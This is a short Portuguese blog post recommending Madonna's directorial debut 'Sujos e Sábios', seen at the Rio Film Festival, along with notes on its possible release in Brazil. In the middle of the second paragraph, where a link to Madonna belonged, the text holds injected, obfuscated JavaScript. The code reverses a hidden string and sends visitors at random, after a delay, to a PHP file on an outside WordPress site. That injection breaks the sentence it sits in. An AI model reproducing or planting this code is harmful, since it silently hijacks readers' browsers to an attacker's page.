‘Sujos e Sábios’, estréia de Madonna na direção, é uma das surpresas agradavéis do Festival de Cinema do Rio

O Júnior me conhece cinematograficamente falando. Quando me recomenda alguma coisa e diz que é a minha cara, as chances dele errar são poucas. A última recomendação dele é Sujos e Sábios, estréia da cantora $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andy/”>Madonna na direção, que ele conferiu no Festival de Cinema do Rio.


Trailer de Sujos e Sábios

Segundo ele, com simplicidade e texto muito bem humorado, o longa é a surpresa mais agradável do festival (até o momento).

O filme ainda não tem estréia marcada no país – mas, há grandes chances de entrar em circuito nacional quando a cantora trazer sua turnê Sticky & Sweet ao país em dezembro.